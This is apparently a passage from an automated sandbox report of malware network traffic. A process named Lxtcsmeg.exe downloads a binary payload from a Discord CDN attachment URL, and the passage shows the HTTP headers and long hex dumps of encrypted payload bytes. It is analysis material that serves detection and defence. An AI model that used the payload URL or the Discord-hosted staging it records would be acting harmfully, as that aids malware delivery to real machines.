87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 Data Ascii: Tu"mJqv[#0}zB'wA@&kidvw$>0U2Zh1vL eX0}JdcLZ7osbhF<s}U2Z,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw
2021-11-25 15:51:48 UTC	886	IN	Data Raw: 58 c1 9b 64 0d f5 95 84 74 0f 47 8c d0 6d 3b 32 07 37 be 5b aa 78 f7 37 69 8d 7d 69 9b e6 89 5c c3 04 a0 ea 32 d1 94 15 1f 54 51 df cd b6 5d 03 e9 a4 39 a4 18 71 68 68 85 f3 e4 42 42 b1 e7 61 a7 50 4d e6 48 1a e2 91 8c b1 e4 4d 95 2d 31 dd 58 51 d4 b5 a9 00 19 1f 54 50 a2 b6 4d 1e 69 23 31 cd d5 72 fa 4f 22 8b 45 4f ae c1 00 22 cd 5b bf d3 91 8d 35 c2 4a f2 0b 86 48 91 89 fc 0d 16 41 c0 8d 41 fe a5 d6 1d 5e 8d 35 1d 59 34 37 0f 7f de 82 de 4c 12 f2 6e 79 74 3b 72 16 9f be 79 07 6e f0 36 74 ff 9a 18 9d e6 1d a6 7c 13 8d be ad 61 36 0a bf 59 55 7e 4c 93 c3 45 4b 5e 70 f5 82 af 78 66 b3 55 5b 31 99 aa e3 f4 4a 96 15 82 22 32 5a be f1 b8 ea 37 e7 9f eb a9 00 a4 19 ee 43 44 e0 60 a4 0a 82 71 2c 47 1e 28 00 9a d7 b4 a1 f0 72 a3 fd fb 52 6a 6d ad 53 d5 99 23 4b Data Ascii: XdtGm;27[x7i}i\2TQ]9qhhBBaPMHM-1XQTPMi#1rO"EO"[5JHAA^5Y47Lnyt;ryn6t\|a6YU~LEK^pxfU[1J"2Z7CD`q,G(rRjmS#K
2021-11-25 15:51:48 UTC	902	IN	Data Raw: 40 4b 29 c4 88 07 42 82 62 e4 30 55 72 cc c0 be f9 a9 d8 fa 4f 23 b9 2c 0a fe dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 b1 9c f4 32 35 90 34 1a 6a 95 bb 7d d3 67 5f 0b 4a 62 d2 ab 3a d6 f5 82 11 14 0f c3 73 59 3c 33 eb 99 dc 44 b1 34 5f 0b 4f 0b 79 cc ea 3b f1 f8 2f 0f 83 a5 fa 43 05 28 49 38 69 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 36 6c c7 3d 99 ae e3 d0 83 d1 01 2d 99 99 d7 77 c7 7c e7 9f ab 3a d6 f5 82 11 14 0f c3 73 59 3c 33 eb 99 dc 44 b1 34 5f 0b 4f 0b 79 cc ea 3b f1 f9 ca 0f 83 a5 fa 43 05 28 46 58 b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 be 6d fe 2b a6 0f f1 fd b2 fa 2a 14 4a 9c 64 97 e4 ec 2c 0b 4a 2e Data Ascii: @K)Bb0UrO#,,Kdw,Kdw,KX254j}g_Jb:sY<3D4_Oy;/C(I8idw,Kdw,Kd6l=-w\|:sY<3D4_Oy;C(FX,Kdw,Kdw,KXm+*Jd,J.
2021-11-25 15:51:48 UTC	918	IN	Data Raw: 69 ef 5b 04 6e 14 4a 95 22 77 0c ea 52 a9 fa cc 38 2c c2 04 50 aa 88 ce 06 6d 08 fd 38 a8 75 35 ed 96 de 6f 9f ae 1a 5d 73 0f 58 3c 38 b1 93 32 a5 9f c3 ad 0e 40 b5 86 19 44 5b 2c 94 b0 d3 e4 d8 c9 88 74 76 0c 13 0e 04 a7 74 0b 3c f8 a6 38 e0 06 2c c8 26 79 07 9e 2c c2 3b b4 a3 f5 49 e0 4b 92 30 be 4d 5b c8 2a 03 67 5f 4b 19 3c f3 36 64 d7 77 12 8c 33 dd 86 2c 4b bd 8e c2 3b a4 f1 b0 c3 ce ed eb 22 65 0c a8 5e 0c 78 e5 11 dd 46 07 6e b4 c3 79 a9 fb 12 0b 79 c8 85 36 49 97 17 1c e0 53 d5 99 23 4a e7 81 49 d7 77 c7 88 e1 f8 5a 37 83 fc 0d 24 f7 f4 40 39 bb ad 0b 86 0c 72 9e 59 c3 21 b0 d6 32 93 a5 af d3 5e 24 bc e1 50 2e 93 96 0b ba ac 73 82 44 5c 2b 0a dd 40 f6 86 77 d9 ba ac 73 82 44 6e 18 df a0 ad 85 a4 05 9a 64 0f 08 03 ef e5 c9 54 af 6b 59 3c 73 7d 94 Data Ascii: i[nJ"wR8,Pm8u5o]sX<82@D[,tvt<8,&y,;IK0M[*g_K<6dw3,K;"e^xFnyy6IS#JIwZ7$@9rY!2^$P.sD\+@wsDndTkY<s}
2021-11-25 15:51:48 UTC	934	IN	Data Raw: 49 99 1f f0 68 1e d7 89 b6 4d 1f 1a c8 59 c3 ba 14 c8 3a ad 85 72 71 8a bc e2 40 7d d6 78 ca 8c 62 de cd dd 1d b8 73 59 10 de 0f f7 07 ea d8 05 97 fc bc 7d a5 2e db 7e e7 24 c7 a7 3c f8 92 c0 4c 10 f1 7c 90 10 56 b4 e0 83 66 87 f1 b4 64 54 34 41 dd a2 5f 90 40 09 b4 24 c8 2d 30 02 0a 3f c8 06 67 a0 91 74 e3 7d 55 b9 f4 cb ab 82 d6 31 5b 17 c4 c8 92 c6 0e 5b 1f 54 50 5b 37 0f 4a a5 2c c0 41 ff 67 64 3f 38 e2 cb d2 19 17 c1 13 1d a6 75 40 20 c8 59 67 a0 91 70 51 c0 7d 1d 66 89 39 24 bc 4b e6 e4 b8 42 83 14 cf 26 b1 10 50 28 41 6a e6 77 87 c5 92 c0 ed 6e 34 dc e8 a9 51 b8 aa 8b 7b cc 39 67 04 18 e6 a5 2e b8 69 ef 73 28 cc 14 84 d8 05 90 96 bd ff e8 e2 56 39 e4 4d 93 cd 34 50 cf 63 3f 23 3e 2b 09 b0 15 7e 93 98 99 81 45 81 ff 85 f1 7b 4b ee 33 a8 af ea a7 15 Data Ascii: IhMY:rq@}xbsY}.~$<L\|VfdT4A_@$-0?gt}U1[[TP[7J,Agd?8u@ YgpQ}f9$KB&P(Ajwn4Q{9g.is(V9M4Pc?#>+~E{K3
2021-11-25 15:51:48 UTC	950	IN	Data Raw: cf e8 dd 79 6e 3b 19 9a d4 d4 e4 93 04 e4 d0 6d ad 85 a8 ff 03 5f 5f 35 22 b7 d8 05 96 56 5c c5 c1 64 d3 e4 e7 60 30 2c a3 36 ef 9a 21 6b ec 08 f5 4b d9 4f d3 e6 c7 c4 99 8a 64 d7 37 6a e6 19 5e 95 89 ea 78 f6 ba 51 86 c4 59 34 12 81 76 07 bc b7 f4 cb 9e e2 11 f5 3a 55 f1 93 c5 a1 30 66 d8 87 50 20 f5 49 16 69 a7 c4 83 a2 98 81 93 c9 29 c5 b1 9b 1e d7 88 6c 03 a2 f8 ba 24 ed 25 43 8e 16 42 d1 84 ac d9 7c 53 a0 ad 55 6c b4 79 b5 44 97 3c b2 8b 50 64 de 7c ca ee 57 6d 61 bb e1 b9 d0 a0 e5 8c d7 a7 d6 09 23 3e 65 b1 d8 fb f0 43 dc 3d 90 59 b7 41 0e 8b df 80 69 66 3e fb 8b bd f1 3b f5 04 64 d1 83 47 7a 44 8f 04 64 df 4d 9d d2 9e b0 af 17 c8 59 38 27 34 4a e2 59 7d e3 4c a2 6c 60 c3 ce c7 3b f3 57 f6 17 55 33 df fc 84 0e fc 03 ef 4f 65 d1 3c 07 91 4d 4f 57 c1 Data Ascii: yn;m__5"V\d`0,6!kKOd7j^xQY4v:U0fP Ii)l$%CB\|SUlyD<Pd\|Wma#>eC=YAif>;dGzDdMY8'4JY}Ll`;WU3Oe<MOW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49764	162.159.135.233	443	C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 15:51:58 UTC	965	OUT	GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-11-25 15:51:58 UTC	965	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 15:51:58 GMT Content-Type: application/octet-stream Content-Length: 455680 Connection: close CF-Ray: 6b3c0a9f181b4315-FRA Accept-Ranges: bytes Age: 105713 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Lxtcsmegwxhfqoabkjaduxyckamobho ETag: "8242fb2442748493aa1d31dda471d43a" Expires: Fri, 25 Nov 2022 15:51:58 GMT Last-Modified: Wed, 24 Nov 2021 08:13:21 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1637741601530592 x-goog-hash: crc32c=lwQmpg== x-goog-hash: md5=gkL7JEJ0hJOqHTHdpHHUOg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 455680 X-GUploader-UploadID: ADPycdututbtUcRl5WSW_hry_FIQngXAEOTvsF_C9upp3XZeadVl41eP9j6KorcCz-oWIrYx9Hq0o2OS5hKBDlbxS2aeJWKHkw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-11-25 15:51:58 UTC	966	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 79 4f 4f 43 48 36 68 69 55 58 44 31 6a 36 4c 4e 78 73 65 53 79 6a 73 36 6f 57 55 43 61 79 49 62 47 6a 38 66 44 6a 4b 35 38 31 44 35 36 32 56 31 51 61 4d 63 58 48 66 66 6b 71 52 71 77 43 30 32 65 7a 7a 67 75 62 47 55 74 6d 62 4b 51 37 57 4f 65 41 63 6b 67 77 6e 6d 44 6d 39 6e 6b 52 53 56 46 4f 52 74 38 4e 6a 59 6f 43 52 72 73 37 4e 54 54 6c 25 32 42 56 76 4e 74 48 42 5a 36 57 71 35 72 44 44 36 64 63 57 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yOOCH6hiUXD1j6LNxseSyjs6oWUCayIbGj8fDjK581D562V1QaMcXHffkqRqwC02ezzgubGUtmbKQ7WOeAckgwnmDm9nkRSVFORt8NjYoCRrs7NTTl%2BVvNtHBZ6Wq5rDD6dcWw%3D%3D"}],"group":"cf-nel","max_age":6048
2021-11-25 15:51:58 UTC	967	IN	Data Raw: 06 a2 3a 2a 02 a3 a5 a2 2b 8e 0f ca 93 89 f5 92 0c b5 6b 2d 8a 76 54 f7 9f ac c2 8a 73 39 ad 5e 8f 8d f7 83 e1 d1 38 31 80 5a f0 7f df cf 22 62 95 9c 2d 8a 73 3c 23 ed f6 02 ac c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 Data Ascii: :*+k-vTs9^81Z"b-s<#DrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yD
2021-11-25 15:51:58 UTC	968	IN	Data Raw: a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd Data Ascii: 7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfT
2021-11-25 15:51:58 UTC	969	IN	Data Raw: 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 Data Ascii: fTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7
2021-11-25 15:51:58 UTC	971	IN	Data Raw: bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 Data Ascii: h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/k
2021-11-25 15:51:58 UTC	972	IN	Data Raw: 8c 67 c6 af b5 f9 a2 e4 d4 a4 c3 93 5e 12 50 13 43 65 c8 08 94 e9 ec 4c 2c f9 99 6f c0 d8 39 49 fb d0 53 1b c9 4e 25 e3 f0 64 6d c7 55 82 8b b4 1f 60 da 5d 1d 05 dc 24 97 66 b1 bc 11 e1 22 0d 13 dd 24 56 0c 2d 93 7a a0 3c 86 64 70 3a 36 d9 b4 cc 6b 0a 30 d6 c7 b9 cc 58 b7 46 93 78 1f 5f 13 46 46 20 85 ab c4 d2 05 da 9d ba 02 ad 6b 56 e1 c0 e3 f0 be f5 60 65 84 2f 3b ad c5 b7 7f 47 1f 15 35 b2 c7 f5 8d dc be 7a 1e b9 e0 a2 c0 be 20 83 f1 1c fb d2 5d f0 66 4e 7a 67 d9 c8 b6 1c 91 ad d2 49 e1 93 c5 3d 9c 3c 1b 1f 73 6d d0 5f 5f f1 19 8e ff 1d 08 23 d9 c2 72 a0 c3 fe 3a c8 92 26 96 8c 69 ba 69 d1 77 53 17 f1 29 7d 41 ba 62 6a e9 03 dd 53 90 f8 22 8f df 0d b7 90 99 11 52 1a 4d ba 96 04 5c c3 23 d6 9d 31 76 96 ee d8 ef 16 e6 40 c6 35 f4 e1 6e 95 73 ac d3 2a 51 Data Ascii: g^PCeL,o9ISN%dmU`]$f"$V-z<dp:6k0XFx_FF kV`e/;G5z ]fNzgI=<sm__#r:&iiwS)}AbjS"RM\#1v@5ns*Q
2021-11-25 15:51:58 UTC	973	IN	Data Raw: 9b b5 76 60 84 83 19 20 52 00 75 e9 c6 a8 df 91 c2 9e 23 00 15 f3 ef ee 20 05 4a 0b 4a 23 79 ac eb ca 2b dc 04 a0 57 88 fb 84 47 52 cc f1 95 04 d9 c0 65 3a 32 0c fa 62 a5 46 b3 b9 f7 ab 50 f5 fe 25 98 d4 b7 9f 04 c7 12 63 07 12 26 fb ec 85 5a e4 71 27 c8 3e 86 22 75 2d 29 90 12 6e 25 85 ed d6 8a 9d 08 9a 3d 93 f5 f0 74 0c b1 ad fa 2e 02 bf fa 19 cd 52 99 69 8c 1c 44 e4 6d 49 66 51 11 37 01 0a 96 08 04 68 6e 51 16 a8 2c 2b 95 84 e7 0d f8 bf 04 43 b3 71 21 e0 96 ce 66 2f 94 e8 98 7a 53 44 e2 7a 55 57 0a 5f e6 47 66 83 05 51 6e 5d 01 f0 84 73 29 a0 ba 3e f1 5f 34 f5 b0 fd b4 c5 2e 78 7f 4c d1 dd f6 24 65 07 f4 5f 51 65 69 d1 4e 80 7a 6d 35 ea 3a 31 e1 2f f7 92 2b 94 7e e4 e4 00 e3 29 e7 ff 87 f9 27 b8 b9 5a 81 04 c4 a4 21 e0 da 76 91 27 f8 f2 1c 03 39 85 30 Data Ascii: v` Ru# JJ#y+WGRe:2bFP%c&Zq'>"u-)n%=t.RiDmIfQ7hnQ,+Cq!f/zSDzUW_GfQn]s)>_4.xL$e_QeiNzm5:1/+~)'Z!v'90
2021-11-25 15:51:58 UTC	975	IN	Data Raw: 69 88 6e a2 2e ae 94 50 8c 0f 36 94 01 38 0a 74 e6 11 96 6c 54 41 53 4d 43 cc 5f c8 39 d2 57 c0 dc 58 ef 01 c9 d6 18 26 98 a5 94 09 24 fd b8 f8 86 6b d1 ca 86 71 11 87 16 bb 17 aa 2e f5 9a 36 3b 92 13 e7 ca 90 e9 1e 7e 4c ff 3f 7a 97 72 85 00 66 b1 7a 6b 6c 34 90 74 b5 97 6e af 41 5d 91 85 e0 73 4e 15 bc e5 fd b5 d5 64 d4 bd 0f 3c 5f 18 79 d1 69 43 22 9a 61 ec 55 50 f9 9a 23 55 c6 f0 09 d0 9f 85 f3 ed 8f 7b 35 7a 49 ac a3 a4 25 d3 48 bc cd c5 77 2e 20 75 eb f6 dd 89 a9 19 db 2e 77 d1 3c 17 21 48 71 58 c6 67 6f 1e 4a f3 25 ab 08 f5 88 84 11 d7 25 e7 34 14 70 4f 10 b0 dc 55 55 51 ea a4 ee cb 60 72 b2 c8 b2 c6 87 4f c3 45 34 e3 aa e5 c6 9b 42 38 c7 2f ec 88 76 6a bf 6b 8c 38 71 5a f9 74 b4 f1 e5 f3 bb 85 08 c1 7d 3f c5 12 63 0a f4 39 c5 f0 71 d7 34 09 20 49 Data Ascii: in.P68tlTASMC_9WX&$kq.6;~L?zrfzkl4tnA]sNd<_yiC"aUP#U{5zI%Hw. u.w<!HqXgoJ%%4pOUUQ`rOE4B8/vjk8qZt}?c9q4 I
2021-11-25 15:51:58 UTC	976	IN	Data Raw: 1b 1e 8b e0 6e ad d4 5b 40 97 e9 18 68 8d e2 45 a3 7a d3 60 f2 9f 9a 3f a2 23 6c 7c d8 80 5a 06 99 87 f2 52 0e b2 40 89 89 1d 8c 6a 8f 9c 66 37 0b 0b 3e d7 58 e1 c4 ac 31 f5 30 6f 0c 51 00 82 40 18 c4 b1 a3 af 59 89 9a 32 08 ac f4 c4 a6 2e 63 e0 7e 43 62 b1 d5 82 85 52 93 72 85 f3 dd db 5a e8 8c 89 8a 8b 8e 2d 92 1d 0a 1c 3a 43 3a ca e8 42 db d1 5c 93 2c 94 17 2f e0 55 6f 1a 98 44 7c 68 dc ad 38 3f 92 14 13 d1 cf 8e 06 43 4e f8 1e 4c 42 3f 2e 41 7f 31 94 0f e1 f5 52 84 e7 7d dc b1 52 c7 1d fb bc 3d e6 29 f7 72 e7 c4 af 70 af 2b fb 4a af ac 97 8e 21 ed 8b 4f 5c 7f a5 46 86 40 21 e6 64 b1 99 c3 7a aa 8d de 50 f5 97 65 c4 4b 5e 70 eb f2 66 b5 15 e9 91 5d 7b 38 68 b7 4e ff ee c5 27 e4 5f e4 0e 58 ed ca 03 d4 2c 50 da 55 2d 91 aa e2 8c f2 01 e0 44 32 0e 6d 3c Data Ascii: n[@hEz`?#l\|ZR@jf7>X10oQ@Y2.c~CbRrZ-:C:B\,/UoD\|h8?CNLB?.A1R}R=)rp+J!O\F@!dzPeK^pf]{8hN'_X,PU-D2m<
2021-11-25 15:51:58 UTC	977	IN	Data Raw: b6 9a fb e6 7f c2 93 30 20 1b 47 48 29 ff 86 71 11 aa 12 00 26 01 f6 0b 2d a7 a0 50 78 84 15 d5 dd b5 78 5d 22 a5 8c 4d 59 43 af 57 56 d6 90 37 1f 79 e4 52 1f e9 cf 31 85 4c 75 f0 23 86 99 ea 7a 69 07 8e 0e 9a 41 39 53 19 cb 39 b1 42 79 03 20 13 31 da 91 94 06 86 eb 64 24 08 55 30 37 be e9 fc 67 7b 85 ed 16 12 57 6a 8f e2 3b 54 0b 44 2e 49 40 14 50 4d ee 4a 9e 2e ff c5 10 51 4c 69 70 91 e1 ef 19 8b d8 98 3f ab 43 4a 6f 39 59 21 db d3 30 4a 8c f6 5b 72 4f 22 6f 14 6c f6 6a f1 c7 76 bb 5f 1c 43 58 88 ae 73 d2 d5 ce b4 ce bd 60 d6 90 6f 75 bd 92 16 76 5d 16 16 e8 56 3c 34 e7 ce b1 45 63 79 f3 91 53 10 ac d8 a3 9c 3b 73 e0 9d 7d d1 c7 26 6f 27 db 03 15 e8 67 20 87 c5 26 5e ad 44 66 af 86 66 69 0c 99 8e 1c bc 83 07 9e 5a 0b a4 28 26 5f 36 24 85 c6 f4 ff 00 8b Data Ascii: 0 GH)q&-Pxx]"MYCWV7yR1Lu#ziA9S9By 1d$U07g{Wj;TD.I@PMJ.QLip?CJo9Y!0J[rO"oljv_CXs`ouv]V<4EcyS;s}&o'g &^DffiZ(&_6$
2021-11-25 15:51:58 UTC	979	IN	Data Raw: c2 a5 9e 0f ea 4c 42 02 40 85 e1 3f af 4c cb 09 b5 a9 bc 07 31 83 f3 de ed 0c 56 d2 81 f8 22 23 d5 86 7b f5 75 9f 51 67 94 e0 6c 19 c6 1a d6 55 3b 3a 2a b6 c7 22 50 f5 65 ea 25 e9 f4 14 d8 4e 0b 20 fd 6b eb be 1b 4d 7d fe ba c6 a9 55 65 e6 34 4f 75 d7 27 67 e7 3c 10 59 6a 8c ea 2b 2e a0 09 16 ff b9 0c 9a 03 c3 f2 6a b2 ff 8a e7 3c 00 ba f1 e6 77 48 9c ab ff b1 40 98 31 64 7f 8b e7 ca 87 69 dc af 70 a2 25 d0 2f df 3d 06 8b db 3c 33 5f 89 0e 39 3d 43 1e ec 63 d7 00 44 0a 33 46 8b e0 ac 4f 9e 67 e1 36 03 da 9c d3 ba cf bd ea f2 95 ca 96 13 df 3d f8 22 6c 83 fa 7b d5 1a 80 40 1c 73 2c 2b cf db 0e a1 00 ba 0f df c0 8a 6b d1 79 e5 c3 14 55 0b 39 8b 15 8d ee 67 02 8a 59 5e 76 e8 78 aa 60 ae 3f 9b d5 43 6d dd 90 27 ef e2 47 47 43 60 7a 1a 48 f7 9c 0e 56 d2 4b e4 Data Ascii: LB@?L1V"#{uQglU;:*"Pe%N kM}Ue4Ou'g<Yj+.j<wH@1dip%/=<3_9=CcD3FOg6="l{@s,+kyU9gY^vx`?Cm'GGC`zHVK
2021-11-25 15:51:58 UTC	980	IN	Data Raw: 60 a8 df d8 5a 44 c3 1e 6d 5d 27 3b fb 64 2d 9a 1a 4c 5e fd 85 cc 70 f7 9d 86 7a 64 5e 09 36 3b b8 ca be 34 88 68 4d 12 5a ef e6 78 bf e8 84 46 29 c9 0f e9 fb b5 8c c3 3c 17 a3 b9 44 c2 84 43 9e 3a de de 6d c7 40 2e 3a 08 92 e5 4b b0 c8 e6 23 dd 0a ac 29 1c 7a b1 dc 11 31 34 06 da 9f 2c f1 b6 c0 d6 ac e5 0d 89 0c 9f 49 1b 32 a9 61 67 01 07 c7 44 d4 9a 39 8f 6d 9f 93 93 f9 a8 ea 94 43 65 0b 28 14 ae 4d a0 37 a7 bc e2 2c 71 2f 58 aa 3a 0e a8 9a 05 31 bc 94 ea df a8 e8 1f 9f b4 2f de a5 17 93 84 7d ce a2 53 f6 e5 97 8a 56 e5 cb e8 e1 e8 43 b2 8f 95 b4 fe 33 53 e5 e2 76 a9 55 ae 47 67 1a 4f 47 ab 11 db dd ee 66 7a f4 3a 34 19 a0 05 20 18 70 78 54 0a 29 c6 6e ed fa 2a 16 49 b5 f9 b7 7d a9 31 8f 48 f4 fd 1e 74 cb 07 af a7 e0 53 79 dd d0 75 66 b3 41 b0 5f 4c 11 Data Ascii: `ZDm]';d-L^pzd^6;4hMZxF)<DC:m@.:K#)z14,I2agD9mCe(M7,q/X:1/}SVC3SvUGgOGfz:4 pxT)n*I}1HtSyufA_L
2021-11-25 15:51:58 UTC	981	IN	Data Raw: cb 31 8e 1d ce 3a c8 c8 1b 98 92 0f a9 c6 c0 72 b4 7b 34 46 21 a6 82 f8 eb 7a 67 f4 49 72 51 20 7e 47 6b d1 34 36 fe 98 0d 17 39 a8 e3 c1 11 38 c8 82 f1 1e 00 ce ba cc b4 74 78 32 bf b3 c2 64 00 f2 98 13 d8 2c 1b fc 9d 51 d6 a7 ba 18 19 22 f6 92 90 a4 c3 e9 f0 09 d8 43 81 21 34 92 78 ad af b6 18 48 f2 3a f8 b5 43 54 5b 2d 7d de fe 27 ee 64 74 52 b4 6d a1 ec 67 b4 c9 0b db 3c 1e 48 90 83 ff 35 bc 15 af ec 52 fc 08 36 d9 b7 94 94 ed a2 5c 2b ae f3 00 9d 68 4e 9e 81 cd e1 c4 23 45 4c 21 e9 f7 a1 ae fb 7c 76 e7 1a b1 b7 72 6c d1 c0 f4 b0 f0 95 42 0c a0 03 37 87 49 40 fa c0 80 fb bd e4 d8 65 19 45 af 0c 2b 83 06 10 88 68 52 f7 2d d2 47 b3 4d 81 e1 3f 87 65 b7 54 cb 79 38 be e0 b4 aa 63 59 92 6b 37 0c ac 28 1f 4f 3f 4e 41 68 44 39 69 00 8c 69 ae 4e b6 6d 89 e0 Data Ascii: 1:r{4F!zgIrQ ~Gk4698tx2d,Q"C!4xH:CT[-}'dtRmg<H5R6\+hN#EL!\|vrlB7I@eE+hR-GM?eTy8cYk7(O?NAhD9iiNm
